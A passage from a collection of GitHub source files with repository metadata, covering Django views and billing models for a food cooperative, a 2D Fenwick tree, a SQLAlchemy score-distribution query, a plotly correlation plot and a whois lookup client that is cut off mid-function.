\n\ndef stateCategory(request, c_id, state):\n    if request.method != 'POST' or not request.user.is_staff:\n        return redirect(\"moderator\")\n    cat_obj = Category.objects.get(Cid=c_id)  # the id field is spelled Cid elsewhere in this module\n    stat_obj = State.objects.get(Sdescription=state)\n    cat_obj.STid = stat_obj\n    cat_obj.save()  # persist the state change\n    return\n\n\ndef stateQuestion(request, q_id, state):\n    if request.method != 'POST' or not request.user.is_staff:\n        return\n    question_obj = Question.objects.get(Qid=q_id)\n    stat_obj = State.objects.get(Sdescription=state)\n    question_obj.STid = stat_obj\n    question_obj.save()  # persist the state change\n    return\n","repo_name":"tringers/kwiss.it","sub_path":"kwiss_it/views/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2071443953","text":"# A Fenwick tree distributes each partial sum over a series of slots that satisfies i += lowbit(i),\n# where i is the index in the BIT array.\n\n# A 2D Fenwick tree has a 2D spatial distribution, and the contributing slots are all combinations of two sets x and y,\n# where x = [ i += lowbit(i) ], y = [ j += lowbit(j) ]. Therefore, we need a nested for loop to update self.bit[i][j].\n\n\nclass NumMatrix(object):\n    def __init__(self, matrix):\n        if not matrix or not matrix[0]:\n            return\n        self.matrix = matrix\n        self.m = len(matrix)\n        self.n = len(matrix[0])\n        self.bit = [[0]*(self.n+1) for _ in range(self.m+1)]\n\n        for i in range(self.m):\n            for j in range(self.n):\n                self.add(i+1, j+1, matrix[i][j])\n        # Fenwick tree indices start from 1\n    \n    # add delta to the Fenwick tree\n    def add(self, i, j, delta):\n        x, y = [], []\n\n        while i <= self.m:\n            x.append(i)\n            i += i & -i\n\n        while j <= self.n:\n            y.append(j)\n            j += j & -j\n\n        for i in x:\n            for j in y:\n                self.bit[i][j] += delta\n    \n    # cumulative sum from (0,0) to (i,j)\n    def query(self, i, j):\n        x, y = [], []\n\n        while i > 0:\n            x.append(i)\n            i -= i & -i\n\n        while j > 0:\n            y.append(j)\n            j -= j & -j\n\n        return sum(self.bit[i][j] for i in x for j in y)\n    \n    # update with an absolute value\n    def update(self, row, col, val):\n        delta = val - self.matrix[row][col]\n        self.matrix[row][col] = val\n        self.add(row + 1, col + 1, delta)\n\n    # area from top-left (row1, col1) to bottom-right (row2, col2), inclusive;\n    # add 1 to row2 and col2 because Fenwick tree indices start from 1\n    def sumRegion(self, row1, col1, row2, col2):\n        row2, col2 = row2 + 1, col2 + 1\n        return self.query(row2, col2) + self.query(row1, col1) \\\n            - self.query(row1, col2) - self.query(row2, col1)\n","repo_name":"mcfair/Algo","sub_path":"Fenwick Tree/308. Range Sum Query 2D - Mutable.py","file_name":"308. Range Sum Query 2D - Mutable.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
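# --- Editor's note: illustrative usage; assumes NumMatrix from the file above is in scope. ---
matrix = [[3, 0, 1],
          [5, 6, 3],
          [1, 2, 0]]
nm = NumMatrix(matrix)
print(nm.sumRegion(0, 0, 1, 1))  # 3 + 0 + 5 + 6 = 14
nm.update(0, 0, 10)              # point update: replace the 3 with a 10
print(nm.sumRegion(0, 0, 1, 1))  # 10 + 0 + 5 + 6 = 21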
 +{"seq_id":"33517815643","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Jan 13, 2013\n'''\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql.expression import label, case\nfrom smarter.reports.helpers.constants import Constants, AssessmentType\nfrom edapi.cache import cache_region\nfrom sqlalchemy.sql.functions import count\nfrom edcore.database.edcore_connector import EdCoreDBConnection\n\nBUCKET_SIZE = 20\n\n\n@cache_region('public.data')\ndef get_summary_distribution(state_code, district_id=None, school_id=None, asmt_type=AssessmentType.SUMMATIVE):\n    '''\n    Get a bucketed distribution of scores\n    '''\n    with EdCoreDBConnection(state_code=state_code) as connection:\n        fact_asmt_outcome_vw = connection.get_table('fact_asmt_outcome')\n        # should it be always for summative?\n        # NOTE: else_ must be NULL (not 0), otherwise count() counts every row\n        query = select([label(Constants.SCORE_BUCKET, (fact_asmt_outcome_vw.c.asmt_score / get_bucket_size()) * get_bucket_size()),\n                        count(case([(fact_asmt_outcome_vw.c.asmt_subject == Constants.MATH, 1)], else_=None)).label(Constants.TOTAL_MATH),\n                        count(case([(fact_asmt_outcome_vw.c.asmt_subject == Constants.ELA, 1)], else_=None)).label(Constants.TOTAL_ELA)],\n                       from_obj=[fact_asmt_outcome_vw])\n        query = query.where(fact_asmt_outcome_vw.c.state_code == state_code)\n        query = query.where(fact_asmt_outcome_vw.c.asmt_type == asmt_type)\n        query = query.where(fact_asmt_outcome_vw.c.rec_status == Constants.CURRENT)\n        if (district_id is not None):\n            query = query.where(fact_asmt_outcome_vw.c.district_id == district_id)\n        if (school_id is not None):\n            query = query.where(fact_asmt_outcome_vw.c.school_id == school_id)\n        query = query.group_by(Constants.SCORE_BUCKET).order_by(Constants.SCORE_BUCKET)\n        return connection.get_result(query)\n\n\ndef get_bucket_size():\n    return BUCKET_SIZE\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter/smarter/reports/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
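# --- Editor's note: illustrative, standalone. ---
# The score_bucket label above floors each score to a multiple of BUCKET_SIZE
# via integer division, i.e. (score // 20) * 20 for a bucket size of 20:
for score in (0, 19, 20, 37, 59):
    print(score, '->', (score // 20) * 20)  # 0->0, 19->0, 20->20, 37->20, 59->40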
 +{"seq_id":"39649143406","text":"import numpy as np\nimport pandas as pd\nimport plotly.io as pio\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom PDSUtilities.plotly import apply_default\nfrom PDSUtilities.plotly import get_font\nfrom PDSUtilities.plotly import get_marker\nfrom PDSUtilities.plotly import update_layout\nfrom PDSUtilities.plotly import hex_to_rgb\nfrom PDSUtilities.plotly import rgb_to_hex\nfrom PDSUtilities.plotly import get_colors\nfrom PDSUtilities.plotly import update_title\nfrom PDSUtilities.plotly import update_width_and_height\nfrom PDSUtilities.pandas import get_numerical_columns\n\ndef get_labels(columns, labels):\n    if isinstance(labels, list):\n        message = \"Length of labels list must match length of columns list...\"\n        assert len(columns) == len(labels), message\n        labels = { f\"{columns[c]}\": labels[c] for c in range(len(columns))}\n    return labels\n\ndef get_color(value, colors):\n    rlo, glo, blo = colors[1]\n    rhi, ghi, bhi = colors[0]\n    fraction = (value + 1.0)/2.001\n    r = rlo + int(np.round(fraction*(rhi - rlo)))\n    g = glo + int(np.round(fraction*(ghi - glo)))\n    b = blo + int(np.round(fraction*(bhi - blo)))\n    return rgb_to_hex((r, g, b))\n\ndef get_scatter_text(x, y, text, font = {}):\n    # TODO: Need to test for more than just list...\n    x = x if isinstance(x, list) else [x]\n    y = y if isinstance(y, list) else [y]\n    return go.Scatter(x = x, y = y, text = text, textfont = font,\n        mode = 'text', showlegend = False, hoverinfo = \"skip\",\n    )\n\n# font\n# axis_font\n# hover_font\n# label_font\n# title_font\n#\n# tick_font\n# legend_font\n# subtitle_font\ndef plot_correlation_triangle(df, columns = None, labels = {},\n    width = None, height = None, title = None, precision = 4,\n    template = None, colors = 0, xangle = 45, yangle = 45,\n    font = {}, axis_font = {}, hover_font = {}, label_font = {},\n    title_font = {}):\n    #\n    font = apply_default(get_font(), font)\n    axis_font = apply_default(font, axis_font)\n    label_font = apply_default(font, label_font)\n    label_font = apply_default(label_font, { 'color': \"#FFFFFF\" })\n    #\n    colors = get_colors(colors)\n    colors = [hex_to_rgb(color) for color in colors]\n    columns = get_numerical_columns(df, columns)\n    labels = get_labels(columns, labels)\n    rows = [columns[c] for c in range(1, len(columns))]\n    cols = [columns[c] for c in range(0, len(columns) - 1)]\n    correlations = df[columns].corr()\n    #\n    fig = make_subplots(rows = len(rows), cols = len(cols),\n        horizontal_spacing = 0.1/len(cols),\n        vertical_spacing = 0.1/len(rows),\n        shared_xaxes = True,\n        shared_yaxes = True,\n        # print_grid = True,\n    )\n    for r in range(len(rows)):\n        for c in range(r + 1):\n            value = correlations[cols[c]][rows[r]]\n            fig.append_trace(\n                go.Scatter(\n                    x = [0.0], y = [0.0],\n                    mode = 'markers+text',\n                    # Make a large square to fill the plot area\n                    # since we can't set the background color...\n                    marker = dict(\n                        symbol = \"square\",\n                        size = 1000,\n                        color = get_color(value, colors),\n                    ),\n                    hoverlabel = dict(font = hover_font),\n                    hovertemplate = f\"{rows[r]}<br>{cols[c]}\",\n
                    text = str(np.round(value, precision)),\n                    name = str(np.round(value, precision)),\n                    textfont = label_font,\n                    showlegend = False,\n                ),\n                r + 1, c + 1\n            )\n    fig.update_xaxes(range = [-1.0, 1.0])\n    fig.update_yaxes(range = [-1.0, 1.0])\n    fig.update_xaxes(showgrid = False, ticks = \"\", mirror = True)\n    fig.update_yaxes(showgrid = False, ticks = \"\", mirror = True)\n    fig.update_xaxes(linecolor = \"black\", linewidth = 0.5, zeroline = False)\n    fig.update_yaxes(linecolor = \"black\", linewidth = 0.5, zeroline = False)\n    # We use a single tick label as the axis label...\n    for c in range(len(cols)):\n        fig.update_xaxes(\n            tickmode = \"array\",\n            tickvals = [0.0],\n            tickfont = axis_font,\n            ticktext = [labels.get(cols[c], cols[c])],\n            tickangle = -xangle,\n            row = len(rows), col = c + 1,\n        )\n    for r in range(len(rows)):\n        fig.update_yaxes(\n            tickmode = \"array\",\n            tickvals = [0.2 if yangle == 45 else 0.0],\n            tickfont = axis_font,\n            ticktext = [\n                labels.get(rows[r], rows[r]) + \" \" if yangle == 45 else \" \"\n            ],\n            tickangle = -yangle,\n            row = r + 1, col = 1,\n        )\n    #\n    fig = update_width_and_height(fig, width, height)\n    fig = update_title(fig, title, title_font, font)\n    fig = update_layout(fig, font = font, template = template)\n    return fig","repo_name":"DrJohnWagner/PDSUtilities","sub_path":"PDSUtilities/pandas/plot_correlation_triangle.py","file_name":"plot_correlation_triangle.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18534402601","text":"from calendar import monthrange\nfrom datetime import date\nfrom decimal import Decimal\n\nfrom django.template.defaultfilters import date as date_filter\nfrom django.conf import settings\nfrom django.db import models\nfrom django.db.models import F, Sum\nfrom django.contrib.auth import get_user_model\n\nMONTHS = {\n    1: 'Januar', 2: 'Februar', 3: 'März', 4: 'April', 5: 'Mai', 6: 'Juni',\n    7: 'Juli', 8: 'August', 9: 'September', 10: 'Oktober', 11: 'November',\n    12: 'Dezember'\n}\n\nUser = get_user_model()\n\n\nclass Bill(models.Model):\n    bill_date = models.DateField(blank=True, null=True)\n    days_in_month = models.PositiveIntegerField(editable=False, verbose_name='Days/Mo')\n    members = models.ManyToManyField(settings.AUTH_USER_MODEL)\n    expense_types = models.ManyToManyField('ExpenseType')\n    terra_daily_rate = models.DecimalField(max_digits=8, decimal_places=2, verbose_name='Terra Rate')\n    total_attendance_days = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, verbose_name='Total Days')\n    total_supermarket = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n    total_invest = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n    total_terra = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n    total_luxury = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n    daily_rate = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n    account_carry_over = models.OneToOneField('Account', blank=True, null=True, on_delete=models.SET_NULL)\n    bill_carry_over = models.OneToOneField('Bill', blank=True, null=True, on_delete=models.SET_NULL)\n    comment = models.TextField(blank=True, null=True)\n    overview = models.TextField(blank=True, null=True)\n\n\n    class Meta:\n        ordering = ['-bill_date']\n        verbose_name = 'Bill'\n\n    def __str__(self):\n        return \"Bill {}\".format(self.bill_date)\n\n    def save(self, *args, 
**kwargs):\n self.days_in_month = monthrange(self.bill_date.year, self.bill_date.month)[1]\n super(Bill, self).save(*args, **kwargs)\n\n def generate_bill_overview(self):\n text = f\"### Essensabrechnung: {date_filter(self.bill_date, 'F Y')} \\n\\n\"\n text += f\"Summe Anwesenheitstage: {self.total_attendance_days:.2f}\\n\"\n text += f\"Summe Terra: {self.total_terra:.2f}€\\n\"\n text += f\"Summe Supermarkt: {self.total_supermarket:.2f}€\\n\"\n text += f\"Summe Invest: {self.total_invest:.2f}€\\n\"\n text += f\"Tagessatz (Terra): {self.daily_rate:.2f} € ({self.terra_daily_rate:.2f}€)\\n\\n\"\n text += \"| Name | Tage | Bezahlen/Guthaben | Kredit + Ausgaben - Essen - Invest - Luxus |\\n\"\n text += \"| :------------ |:---------------|:-----|:---------|\\n\"\n for user_bill in self.userbill_set.all().order_by('user__username'):\n text += f\"| **{user_bill.user}** | {user_bill.attendance_days:.1f} | \"\n if user_bill.get_user_has_to_pay_amount():\n text += f\"Zu bezahlen: **{user_bill.get_user_has_to_pay_amount():.2f}€** | {user_bill.credit:.2f} + {user_bill.expense_sum:.2f} - {user_bill.food_sum:.2f} - {user_bill.invest_sum:.2f} - {user_bill.luxury_sum:.2f} |\\n\"\n elif user_bill.get_user_credit():\n text += f\"Guthaben: {user_bill.get_user_credit():.2f}€ | {user_bill.credit:.2f} + {user_bill.expense_sum:.2f} - {user_bill.food_sum:.2f} - {user_bill.invest_sum:.2f} - {user_bill.luxury_sum:.2f} |\\n\"\n \n return text \n\n\n def make_bill_calculation(self):\n user_bills = self.userbill_set.all()\n # calculate totals of month and save in object\n total_attendance_days = user_bills.aggregate(total_attendance_days=Sum(F('attendance_days') * F('calculation_factor')))['total_attendance_days']\n total_luxury = user_bills.aggregate(Sum('luxury_sum'))['luxury_sum__sum'] or 0\n\n food_expense_types = ExpenseType.objects.filter(is_invest=False)\n invest_expense_types = ExpenseType.objects.filter(is_invest=True)\n\n all_food_expenses = Expense.objects.filter(expense_type__in=food_expense_types, user_bill__bill=self)\n total_supermarket = all_food_expenses.aggregate(Sum('amount'))['amount__sum'] or 0\n\n all_invest_expenses = Expense.objects.filter(expense_type__in=invest_expense_types, user_bill__bill=self)\n total_invest = all_invest_expenses.aggregate(Sum('amount'))['amount__sum'] or 0\n\n self.total_attendance_days = total_attendance_days\n self.total_supermarket = total_supermarket\n self.total_terra = total_attendance_days * self.terra_daily_rate\n self.total_invest = total_invest\n self.total_luxury = total_luxury\n self.daily_rate = (self.total_supermarket + self.total_terra) / self.total_attendance_days\n self.save()\n\n # calculate the share per user for the invest sum, respecting the calculation rate\n invest_share = self.total_invest / user_bills.filter(expense_types__in=invest_expense_types).aggregate(user_count=Sum('calculation_factor'))['user_count']\n # calculate user Food sum\n for user_bill in user_bills:\n user_credit = 0\n if self.account_carry_over and UserPayback.objects.filter(user=user_bill.user, account=self.account_carry_over).exists():\n # carry over positive and negative userpayback total\n user_credit += UserPayback.objects.get(user=user_bill.user, account=self.account_carry_over).total\n if self.bill_carry_over and UserBill.objects.filter(user=user_bill.user, bill=self.bill_carry_over).exists():\n last_user_bill = UserBill.objects.get(user=user_bill.user, bill=self.bill_carry_over)\n if last_user_bill.get_user_credit():\n user_credit += last_user_bill.get_user_credit()\n 
user_bill.credit = user_credit\n user_bill.food_sum = user_bill.calculation_factor * user_bill.attendance_days * user_bill.bill.daily_rate\n if user_bill.expense_types.filter(is_invest=True).exists():\n user_bill.invest_sum = invest_share * user_bill.calculation_factor\n else:\n user_bill.invest_sum = 0\n user_expense_food = all_food_expenses.filter(user_bill=user_bill).aggregate(Sum('amount'))['amount__sum'] or 0\n user_expense_invest = all_invest_expenses.filter(user_bill=user_bill).aggregate(Sum('amount'))['amount__sum'] or 0\n user_bill.total = user_bill.credit + user_expense_food + user_expense_invest - user_bill.food_sum - user_bill.invest_sum - user_bill.luxury_sum\n user_bill.expense_sum = user_expense_food + user_expense_invest\n user_bill.save()\n self.overview = self.generate_bill_overview()\n self.save(update_fields=['overview'])\n\n\nclass UserBill(models.Model):\n bill = models.ForeignKey('Bill', on_delete=models.PROTECT)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n calculation_factor = models.DecimalField(max_digits=8, decimal_places=2, default=1, verbose_name='Calcf.')\n expense_types = models.ManyToManyField('ExpenseType')\n attendance_days = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, verbose_name='Attend. days')\n credit = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n food_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n luxury_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n invest_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n expense_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n total = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n has_paid = models.BooleanField(default=False, verbose_name='Paid?')\n comment = models.TextField(blank=True, null=True)\n\n class Meta:\n unique_together = ['bill', 'user']\n ordering = ['-bill__bill_date']\n verbose_name = 'User Bill'\n\n def __str__(self):\n return \"%s - %s\" % (self.bill, self.user)\n\n def get_user_has_to_pay_amount(self):\n return self.total <= 0 and abs(self.total) or None\n \n def get_user_credit(self):\n return self.total > 0 and abs(self.total) or None\n\n\nclass ExpenseType(models.Model):\n name = models.CharField(max_length=255)\n is_invest = models.BooleanField(default=False)\n\n class Meta:\n verbose_name = 'Expense Type'\n\n def __str__(self):\n return self.name\n\n\nclass Expense(models.Model):\n expense_type = models.ForeignKey(ExpenseType, on_delete=models.PROTECT)\n user_bill = models.ForeignKey(UserBill, on_delete=models.PROTECT)\n amount = models.DecimalField(max_digits=8, decimal_places=2)\n comment = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name = 'Expense'\n\n\nclass Inventory(models.Model):\n inventory_date = models.DateField(default=date.today)\n sum_inventory = models.DecimalField(max_digits=8, decimal_places=2, help_text=\"incl. 
luxury\")\n sum_cash = models.DecimalField(max_digits=8, decimal_places=2)\n sum_luxury = models.DecimalField(max_digits=8, decimal_places=2)\n comment = models.TextField(blank=True, null=True)\n bills = models.ManyToManyField('Bill', blank=True)\n\n class Meta:\n ordering = ['-inventory_date']\n verbose_name = 'Inventory'\n verbose_name_plural = 'Inventories'\n\n def __str__(self):\n return \"Inventory: {}\".format(self.inventory_date)\n\n def get_previous_inventory(self):\n return Inventory.objects.filter(inventory_date__lt=self.inventory_date).first()\n\n\nclass TerraInvoice(models.Model):\n terra_invoice_date = models.DateField()\n invoice_number = models.CharField(max_length=255, blank=True, null=True)\n invoice_sum = models.DecimalField(max_digits=8, decimal_places=2)\n deposit_sum = models.DecimalField(max_digits=8, decimal_places=2)\n luxury_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_sum_7 = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_sum_19 = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n other_sum = models.DecimalField(max_digits=8, decimal_places=2, default=0, help_text=\"Other extraordinary sum wich should not be included in the terra factor.\")\n is_pumpwerk = models.BooleanField(default=True, verbose_name='Is pumpwerk order?')\n fee = models.PositiveSmallIntegerField(blank=True, null=True, verbose_name='Additional fee', default=1, help_text=\"Fee in percentage, e.g. 1 for 1% or 2 for 2%.\")\n\n class Meta:\n verbose_name = 'Terra Invoice'\n verbose_name_plural = 'Terra Invoices'\n ordering = ['-terra_invoice_date']\n\n def __str__(self):\n return \"Terra Invoice: {} {}\".format(self.invoice_number, self.terra_invoice_date)\n\n def save(self, *args, **kwargs):\n if not self.luxury_sum and (self.luxury_sum_7 or self.luxury_sum_19):\n self.luxury_sum = (self.luxury_sum_7 * Decimal(1.07)) + (self.luxury_sum_19 * Decimal(1.19))\n super().save(*args, **kwargs)\n\n @property\n def invoice_sum_plus_fee(self):\n if self.fee:\n return ((self.invoice_sum - (self.deposit_sum or 0) - (self.luxury_sum or 0)) * (Decimal(1.0) + self.fee / Decimal(100.0))).quantize(Decimal('0.01'))\n else:\n return self.invoice_sum\n\n\nclass Payment(models.Model):\n title = models.CharField(max_length=255)\n payment_date = models.DateField(default=date.today)\n payment_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n bills = models.ManyToManyField('TerraInvoice')\n\n class Meta:\n verbose_name = 'Payment'\n verbose_name_plural = 'Payments'\n ordering = ['-payment_date']\n\n def __str__(self):\n return self.title\n\n\nclass Account(models.Model):\n title = models.CharField(max_length=255)\n inventory = models.ForeignKey('Inventory', on_delete=models.PROTECT, null=True, blank=True, related_name='account')\n additional_inventory_food = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Add. inv. food')\n terra_luxury_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_consumed = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_paid_diff = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Lux paid diff')\n terra_brutto_all_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, help_text=\"Sum of all brutto terra invoice totals\", verbose_name='Tot. 
Terra brutto (all)')\n terra_food_others_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. food (others)')\n terra_food_others_fee_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. food (others) + fee')\n terra_brutto_others_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, help_text=\"Sum of all terra invoices without deposit and not from pumpwerk\")\n terra_deposit_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Deposit sum')\n terra_food_pumpwerk_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n terra_food_pumpwerk_fee = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Fee food (PW)')\n food_expenses_pumpwerk_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. food (PW)')\n attendance_day_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. days')\n previous_terra_daily_rate = models.DecimalField(max_digits=8, decimal_places=2, verbose_name='Prev. Terra rate')\n corrected_terra_daily_rate = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='New Terra rate (+Fee)')\n \n comment = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name = 'Account'\n verbose_name_plural = 'Accounts'\n ordering = ['-inventory__inventory_date']\n\n def __str__(self):\n return \"Account: {}\".format(self.title)\n\n def calculate(self):\n # get relevant objects\n previous_inventory = self.inventory.get_previous_inventory()\n user_bills = UserBill.objects.filter(bill__in=self.inventory.bills.all())\n terra_invoices = TerraInvoice.objects.filter(terra_invoice_date__gt=previous_inventory.inventory_date, terra_invoice_date__lte=self.inventory.inventory_date)\n\n # make all the calculations\n self.attendance_day_sum = user_bills.aggregate(attendance_days_sum=Sum(F('attendance_days') * F('user__calculation_factor')))['attendance_days_sum']\n self.additional_inventory_food = (self.inventory.sum_inventory - self.inventory.sum_luxury) - (previous_inventory.sum_inventory - previous_inventory.sum_luxury)\n \n user_bill_luxury_sum = user_bills.aggregate(luxury_sum=Sum('luxury_sum'))['luxury_sum']\n terra_sums = terra_invoices.aggregate(invoice_sum=Sum('invoice_sum'), deposit_sum=Sum('deposit_sum'), luxury_sum=Sum('luxury_sum'), other_sum=Sum('other_sum'))\n self.terra_luxury_sum = terra_sums['luxury_sum']\n self.luxury_consumed = self.terra_luxury_sum - (self.inventory.sum_luxury - previous_inventory.sum_luxury)\n self.luxury_paid_diff = user_bill_luxury_sum + self.inventory.sum_cash - self.luxury_consumed \n self.terra_brutto_all_sum = terra_sums['invoice_sum']\n self.terra_deposit_sum = terra_sums['deposit_sum']\n\n terra_brutto_others_sum = terra_invoices.filter(is_pumpwerk=False).aggregate(invoice_total=Sum(F('invoice_sum') - F('deposit_sum')))['invoice_total']\n terra_brutto_others_fee_sum = terra_invoices.filter(is_pumpwerk=False).aggregate(invoice_total=Sum((F('invoice_sum') - F('deposit_sum')) * (1.0 + F('fee') / 100.0), output_field=models.DecimalField()))['invoice_total']\n # other_invoice_deposit_sum = terra_invoices.filter(is_pumpwerk=False).aggregate(deposit_sum=Sum('deposit_sum'))['deposit_sum']\n self.terra_food_others_fee_sum = terra_brutto_others_fee_sum\n self.terra_food_others_sum = terra_brutto_others_sum\n 
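The fee handling here (and TerraInvoice.invoice_sum_plus_fee further up) applies a percentage fee to the net invoice and rounds to cents; a quick worked example with made-up figures, standalone and outside the model:

from decimal import Decimal

invoice_sum = Decimal('250.00')
deposit_sum = Decimal('12.50')
luxury_sum = Decimal('30.00')
fee = 2  # percent, like TerraInvoice.fee

net = invoice_sum - deposit_sum - luxury_sum  # 207.50
total = (net * (Decimal(1) + Decimal(fee) / Decimal(100))).quantize(Decimal('0.01'))
print(total)  # 211.65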
self.terra_brutto_others_sum = terra_brutto_others_sum\n        terra_food_pumpwerk_sum = terra_invoices.filter(is_pumpwerk=True).aggregate(invoice_total=Sum(F('invoice_sum') - F('deposit_sum') - F('luxury_sum')))['invoice_total']\n        terra_food_pumpwerk_fee = terra_invoices.filter(is_pumpwerk=True).aggregate(invoice_total=Sum((F('invoice_sum') - F('deposit_sum') - F('luxury_sum')) * (F('fee') / 100.0), output_field=models.DecimalField()))['invoice_total']\n        self.terra_food_pumpwerk_sum = terra_food_pumpwerk_sum\n        self.terra_food_pumpwerk_fee = terra_food_pumpwerk_fee\n        self.food_expenses_pumpwerk_sum = self.terra_food_pumpwerk_sum - self.additional_inventory_food\n        self.corrected_terra_daily_rate = (self.food_expenses_pumpwerk_sum + self.terra_food_pumpwerk_fee) / self.attendance_day_sum\n\n        self.save()\n\n        # delete existing UserPaybacks for this account\n        UserPayback.objects.filter(account=self).delete()\n        # create all the UserPayback objects\n        user_attendance_days = user_bills.values('user').order_by('user').annotate(sum_attendance_days=Sum('attendance_days'))\n        for user_attendance_day in user_attendance_days:\n            user = User.objects.get(pk=user_attendance_day['user'])\n            user_payback, created = UserPayback.objects.get_or_create(\n                user=user,\n                account=self,\n                total_days=user_attendance_day['sum_attendance_days'],\n                total=user_attendance_day['sum_attendance_days'] * user.calculation_factor * (self.previous_terra_daily_rate - self.corrected_terra_daily_rate),\n            )\n\n\nclass UserPayback(models.Model):\n    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n    account = models.ForeignKey('Account', on_delete=models.PROTECT)\n    total_days = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n    total = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n    has_paid = models.BooleanField(default=False, verbose_name='Paid?')\n    comment = models.TextField(blank=True, null=True)\n\n    class Meta:\n        unique_together = ['user', 'account']\n        verbose_name = 'User payback'\n        verbose_name_plural = 'User paybacks'\n        ordering = ['-account', 'user']\n\n    def __str__(self):\n        return \"User payback: {}\".format(self.account.title)\n","repo_name":"bruecksen/pumpwerk","sub_path":"pumpwerk/food/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31082528946","text":"import requests\nimport socket\n\nfrom typing import List\n\n\nclass Whois:\n    @staticmethod\n    def whois_tcp_query(query: str, server: str, strip_comments: bool = False) -> List[str]:\n        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        client_socket.settimeout(10)\n        client_socket.connect((server, 43))\n        client_socket.send(bytes(query, 'utf-8') + b'\\r\\n')\n        response = b''\n        while True:\n            received_data = client_socket.recv(4096)\n            response += received_data\n            if not received_data:\n                break\n        client_socket.close()\n        response_str = response.decode('utf-8', 'replace')\n        response_lines = [line for line in response_str.splitlines() if line]\n        if strip_comments:\n            return [response_line for response_line in response_lines if not response_line.startswith('%')]\n        else:\n            return response_lines\n\n    @staticmethod\n    def whois_http_query(query: str, server: str, strip_comments: bool = False) -> List[str]:\n        url = server + query\n        response = requests.request(\n            method='GET',\n            url=url,\n            verify=False,\n        )\n        if response.status_code == 200:\n            response_lines = 
response.text.splitlines()  # .text decodes to str, so the '%' checks and the List[str] hint hold\n            if strip_comments:\n                return [response_line for response_line in response_lines if not response_line.startswith('%')]\n            else:\n                return response_lines\n        else:\n            return []\n\n    def get_whois_server(self, tld_name: str) -> str:\n        tld_name = tld_name.lower()\n        response_lines = self.whois_tcp_query(tld_name, 'whois.iana.org')\n        whois_server = None\n        for line in response_lines:\n            if line.startswith('whois:'):\n                whois_server = line.replace('whois:', '').strip()\n\n        return whois_server\n\n    def domain_query(self, domain_name: str) -> List[str]:\n        domain_parts = domain_name.split('.')\n        # the TLD is the last label, so this also works for subdomains\n        whois_server = self.get_whois_server(domain_parts[-1])\n        return Whois.whois_tcp_query(\n            query=domain_name, server=whois_server\n        )\n\n    @staticmethod\n    def domain_available(domain_name: str, whois_server: str, available_search_str: str) -> bool:\n        whois_server_parts = whois_server.split('://')\n        protocol = whois_server_parts[0].lower()\n\n        response_lines = []\n        if protocol 